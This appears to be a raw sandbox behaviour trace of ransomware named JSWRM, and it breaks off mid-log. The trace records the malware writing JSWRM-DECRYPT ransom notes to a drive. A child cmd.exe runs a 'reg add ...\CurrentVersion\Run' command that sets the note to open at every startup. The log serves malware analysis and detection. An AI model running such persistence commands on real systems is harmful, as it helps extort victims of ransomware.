ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.527] GetCurrentThreadId () returned 0x1024 [0058.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a8d0 | out: hHeap=0x1e0000) returned 1 [0058.528] GetLastError () returned 0x3 [0058.528] SetLastError (dwErrCode=0x3) [0058.528] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f6078 | out: hHeap=0x1e0000) returned 1 [0058.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Thread: id = 101 os_tid = 0x1028 [0058.529] GetLastError () returned 0x57 [0058.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x8, Size=0x364) returned 0x21af28 [0058.529] SetLastError (dwErrCode=0x57) [0058.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.529] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.529] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.533] GetFileAttributesW (lpFileName="Z:\\JSWRM-DECRYPT.hta" (normalized: "z:\\jswrm-decrypt.hta")) returned 0xffffffff [0058.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.533] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x511c8cc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0058.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23cc80 [0058.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0058.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x2471a8 [0058.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cc80 | out: hHeap=0x1e0000) returned 1 [0058.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0058.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.533] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0058.537] CreateFileW (lpFileName="Z:\\JSWRM-DECRYPT.hta" (normalized: "z:\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0058.537] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0058.537] WriteFile (in: hFile=0xffffffff, lpBuffer=0x511c9e0, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x511c9ac, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x511c9ac, lpOverlapped=0x0) returned 0 [0058.537] CloseHandle (hObject=0xffffffff) returned 1 [0058.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0058.537] FindFirstFileW (in: lpFileName="Z:\\*.*", lpFindFileData=0x511fa68 | out: lpFindFileData=0x511fa68*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x70, ftLastAccessTime.dwLowDateTime=0xffffffff, ftLastAccessTime.dwHighDateTime=0xffffffff, ftLastWriteTime.dwLowDateTime=0x77c08939, ftLastWriteTime.dwHighDateTime=0x77bee043, nFileSizeHigh=0x77cc7c0c, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="\xcc80\x23\xaf20\x21\xaf20\x21\x0a")) returned 0xffffffff [0058.537] GetCurrentThreadId () returned 0x1028 [0058.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a8e8 | out: hHeap=0x1e0000) returned 1 [0058.537] GetLastError () returned 0x3 [0058.537] SetLastError (dwErrCode=0x3) [0058.537] FreeLibraryAndExitThread (hLibModule=0x1320000, dwExitCode=0x0) [0058.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f6198 | out: hHeap=0x1e0000) returned 1 [0058.537] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21af28 | out: hHeap=0x1e0000) returned 1 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x49d1f000" os_pid = "0x5f0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0xb08" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000fac7" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 9 os_tid = 0xa84 Thread: id = 10 os_tid = 0xa2c Thread: id = 11 os_tid = 0xa14 Thread: id = 12 os_tid = 0x8dc Thread: id = 13 os_tid = 0x8d4 Thread: id = 14 os_tid = 0x520 Thread: id = 15 os_tid = 0x67c Thread: id = 16 os_tid = 0x678 Thread: id = 17 os_tid = 0x644 Thread: id = 18 os_tid = 0x640 Thread: id = 19 os_tid = 0x63c Thread: id = 20 os_tid = 0x5f4 Process: id = "3" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x628c6000" os_pid = "0x3fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb08" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:000103c1" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 21 os_tid = 0x490 [0049.733] GetModuleHandleA (lpModuleName=0x0) returned 0xdf0000 [0049.733] __set_app_type (_Type=0x1) [0049.733] __p__fmode () returned 0x77ae3c14 [0049.733] __p__commode () returned 0x77ae49ec [0049.733] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe06fd0) returned 0x0 [0049.734] __getmainargs (in: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac, _DoWildCard=0, _StartInfo=0xe1d1b8 | out: _Argc=0xe1d1a4, _Argv=0xe1d1a8, _Env=0xe1d1ac) returned 0 [0049.734] _onexit (_Func=0xe08030) returned 0xe08030 [0049.734] _onexit (_Func=0xe08040) returned 0xe08040 [0049.734] _onexit (_Func=0xe08050) returned 0xe08050 [0049.734] _onexit (_Func=0xe08060) returned 0xe08060 [0049.734] _onexit (_Func=0xe08070) returned 0xe08070 [0049.744] _onexit (_Func=0xe08080) returned 0xe08080 [0049.744] GetCurrentThreadId () returned 0x490 [0049.744] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x490) returned 0xbc [0049.745] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75e90000 [0049.745] GetProcAddress (hModule=0x75e90000, lpProcName="SetThreadUILanguage") returned 0x75ea4f70 [0049.745] SetThreadUILanguage (LangId=0x0) returned 0x260409 [0049.762] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0049.762] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ff764 | out: phkResult=0x4ff764*=0x0) returned 0x2 [0049.763] VirtualQuery (in: lpAddress=0x4ff76f, lpBuffer=0x4ff71c, dwLength=0x1c | out: lpBuffer=0x4ff71c*(BaseAddress=0x4ff000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.763] VirtualQuery (in: lpAddress=0x400000, lpBuffer=0x4ff71c, dwLength=0x1c | out: lpBuffer=0x4ff71c*(BaseAddress=0x400000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0049.763] VirtualQuery (in: lpAddress=0x401000, lpBuffer=0x4ff71c, dwLength=0x1c | out: lpBuffer=0x4ff71c*(BaseAddress=0x401000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0049.763] VirtualQuery (in: lpAddress=0x403000, lpBuffer=0x4ff71c, dwLength=0x1c | out: lpBuffer=0x4ff71c*(BaseAddress=0x403000, AllocationBase=0x400000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0049.763] VirtualQuery (in: lpAddress=0x500000, lpBuffer=0x4ff71c, dwLength=0x1c | out: lpBuffer=0x4ff71c*(BaseAddress=0x500000, AllocationBase=0x500000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0049.763] GetConsoleOutputCP () returned 0x1b5 [0049.763] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0049.763] SetConsoleCtrlHandler (HandlerRoutine=0xe17260, Add=1) returned 1 [0049.763] _get_osfhandle (_FileHandle=1) returned 0x90 [0049.763] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe2388c | out: lpMode=0xe2388c) returned 1 [0049.764] _get_osfhandle (_FileHandle=0) returned 0x8c [0049.764] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23888 | out: lpMode=0xe23888) returned 1 [0049.764] _get_osfhandle (_FileHandle=1) returned 0x90 [0049.764] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x0) returned 1 [0049.764] _get_osfhandle (_FileHandle=1) returned 0x90 [0049.764] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xe23890 | out: lpMode=0xe23890) returned 1 [0049.765] _get_osfhandle (_FileHandle=1) returned 0x90 [0049.765] SetConsoleMode (hConsoleHandle=0x90, dwMode=0x7) returned 1 [0049.765] _get_osfhandle (_FileHandle=0) returned 0x8c [0049.765] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xe23894 | out: lpMode=0xe23894) returned 1 [0049.765] _get_osfhandle (_FileHandle=0) returned 0x8c [0049.765] SetConsoleMode (hConsoleHandle=0x8c, dwMode=0x1e7) returned 1 [0049.765] GetEnvironmentStringsW () returned 0x744ca8* [0049.765] GetProcessHeap () returned 0x740000 [0049.765] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xaca) returned 0x745780 [0049.766] FreeEnvironmentStringsA (penv="A") returned 1 [0049.766] GetProcessHeap () returned 0x740000 [0049.766] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x4) returned 0x744788 [0049.766] GetEnvironmentStringsW () returned 0x744ca8* [0049.766] GetProcessHeap () returned 0x740000 [0049.766] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xaca) returned 0x746258 [0049.766] FreeEnvironmentStringsA (penv="A") returned 1 [0049.766] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4fe6c0 | out: phkResult=0x4fe6c0*=0xcc) returned 0x0 [0049.766] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x0, lpData=0x4fe6cc*=0x0, lpcbData=0x4fe6c4*=0x1000) returned 0x2 [0049.766] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x4, lpData=0x4fe6cc*=0x1, lpcbData=0x4fe6c4*=0x4) returned 0x0 [0049.766] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x0, lpData=0x4fe6cc*=0x1, lpcbData=0x4fe6c4*=0x1000) returned 0x2 [0049.766] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x4, lpData=0x4fe6cc*=0x0, lpcbData=0x4fe6c4*=0x4) returned 0x0 [0049.766] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x4, lpData=0x4fe6cc*=0x40, lpcbData=0x4fe6c4*=0x4) returned 0x0 [0049.766] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x4, lpData=0x4fe6cc*=0x40, lpcbData=0x4fe6c4*=0x4) returned 0x0 [0049.766] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x0, lpData=0x4fe6cc*=0x40, lpcbData=0x4fe6c4*=0x1000) returned 0x2 [0049.766] RegCloseKey (hKey=0xcc) returned 0x0 [0049.766] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4fe6c0 | out: phkResult=0x4fe6c0*=0xcc) returned 0x0 [0049.766] RegQueryValueExW (in: hKey=0xcc, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x0, lpData=0x4fe6cc*=0x40, lpcbData=0x4fe6c4*=0x1000) returned 0x2 [0049.767] RegQueryValueExW (in: hKey=0xcc, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x4, lpData=0x4fe6cc*=0x1, lpcbData=0x4fe6c4*=0x4) returned 0x0 [0049.767] RegQueryValueExW (in: hKey=0xcc, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x0, lpData=0x4fe6cc*=0x1, lpcbData=0x4fe6c4*=0x1000) returned 0x2 [0049.767] RegQueryValueExW (in: hKey=0xcc, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x4, lpData=0x4fe6cc*=0x0, lpcbData=0x4fe6c4*=0x4) returned 0x0 [0049.767] RegQueryValueExW (in: hKey=0xcc, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x4, lpData=0x4fe6cc*=0x9, lpcbData=0x4fe6c4*=0x4) returned 0x0 [0049.767] RegQueryValueExW (in: hKey=0xcc, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x4, lpData=0x4fe6cc*=0x9, lpcbData=0x4fe6c4*=0x4) returned 0x0 [0049.767] RegQueryValueExW (in: hKey=0xcc, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4fe6c8, lpData=0x4fe6cc, lpcbData=0x4fe6c4*=0x1000 | out: lpType=0x4fe6c8*=0x0, lpData=0x4fe6cc*=0x9, lpcbData=0x4fe6c4*=0x1000) returned 0x2 [0049.767] RegCloseKey (hKey=0xcc) returned 0x0 [0049.767] time (in: timer=0x0 | out: timer=0x0) returned 0x5d302270 [0049.767] srand (_Seed=0x5d302270) [0049.767] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y" [0049.767] malloc (_Size=0x4000) returned 0x6921f0 [0049.767] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v \"zapiska\" /d \"C:\\ProgramData\\JSWRM-DECRYPT.txt\" -y" [0049.767] malloc (_Size=0xffce) returned 0x940048 [0049.768] ??_V@YAXPAX@Z () returned 0x4ff6a4 [0049.768] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x940048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0049.769] malloc (_Size=0xffce) returned 0x950020 [0049.770] ??_V@YAXPAX@Z () returned 0x4ff478 [0049.770] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x950020, nSize=0x7fe7 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0049.770] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0049.770] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0049.770] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0049.770] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0049.770] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0049.770] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0049.770] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0049.770] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0049.770] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0049.770] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0049.770] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0049.771] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0049.771] GetProcessHeap () returned 0x740000 [0049.771] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x745780) returned 1 [0049.771] GetEnvironmentStringsW () returned 0x744ca8* [0049.771] GetProcessHeap () returned 0x740000 [0049.771] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xae2) returned 0x747820 [0049.771] FreeEnvironmentStringsA (penv="A") returned 1 [0049.771] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1b [0049.771] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xe1f840, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0049.771] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0049.771] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0049.771] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0049.771] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0049.771] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0049.771] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0049.771] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0049.771] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0049.771] malloc (_Size=0xffce) returned 0x95fff8 [0049.772] ??_V@YAXPAX@Z () returned 0x4ff210 [0049.772] GetProcessHeap () returned 0x740000 [0049.772] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x38) returned 0x740ae0 [0049.772] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x95fff8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0049.772] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x7fe7, lpBuffer=0x95fff8, lpFilePart=0x4ff25c | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x4ff25c*="Desktop") returned 0x17 [0049.773] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0049.773] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4fefe0 | out: lpFindFileData=0x4fefe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x740b20 [0049.773] FindClose (in: hFindFile=0x740b20 | out: hFindFile=0x740b20) returned 1 [0049.773] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0x4fefe0 | out: lpFindFileData=0x4fefe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD1HVy", cAlternateFileName="")) returned 0x740b20 [0049.773] FindClose (in: hFindFile=0x740b20 | out: hFindFile=0x740b20) returned 1 [0049.773] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0x4fefe0 | out: lpFindFileData=0x4fefe0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xff77889f, ftLastAccessTime.dwHighDateTime=0x1d53d3b, ftLastWriteTime.dwLowDateTime=0xff77889f, ftLastWriteTime.dwHighDateTime=0x1d53d3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x740b20 [0049.774] FindClose (in: hFindFile=0x740b20 | out: hFindFile=0x740b20) returned 1 [0049.774] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0049.774] SetCurrentDirectoryW (lpPathName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 1 [0049.774] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\FD1HVy\\Desktop") returned 1 [0049.774] GetProcessHeap () returned 0x740000 [0049.774] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x747820) returned 1 [0049.774] GetEnvironmentStringsW () returned 0x744ca8* [0049.774] GetProcessHeap () returned 0x740000 [0049.774] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xb1a) returned 0x746d30 [0049.774] FreeEnvironmentStringsA (penv="=") returned 1 [0049.774] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x940048 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0049.774] GetProcessHeap () returned 0x740000 [0049.774] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x740ae0) returned 1 [0049.774] ??_V@YAXPAX@Z () returned 0x1 [0049.774] ??_V@YAXPAX@Z () returned 0x1 [0049.774] GetProcessHeap () returned 0x740000 [0049.774] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0x400e) returned 0x748e38 [0049.775] GetProcessHeap () returned 0x740000 [0049.775] RtlAllocateHeap (HeapHandle=0x740000, Flags=0x8, Size=0xee) returned 0x747858 [0049.775] GetProcessHeap () returned 0x740000 [0049.775] RtlFreeHeap (HeapHandle=0x740000, Flags=0x0, BaseAddress=0x748e38) returned 1 [0049.775] GetConsoleOutputCP () returned 0x1b5 [0049.850] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe23850 | out: lpCPInfo=0xe23850) returned 1 [0049.850] GetUserDefaultLCID () returned 0x409 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xe1f82c, cchData=8 | out: lpLCData=":") returned 2 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4ff5cc, cchData=128 | out: lpLCData="0") returned 2 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4ff5cc, cchData=128 | out: lpLCData="0") returned 2 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4ff5cc, cchData=128 | out: lpLCData="1") returned 2 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xe1f81c, cchData=8 | out: lpLCData="/") returned 2 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xe1f7b8, cchData=32 | out: lpLCData="Mon") returned 4 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xe1f778, cchData=32 | out: lpLCData="Tue") returned 4 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xe1f738, cchData=32 | out: lpLCData="Wed") returned 4 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xe1f6f8, cchData=32 | out: lpLCData="Thu") returned 4 [0049.851] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xe1f6b8, cchData=32 | out: lpLCData="Fri") returned 4 [0049.851] 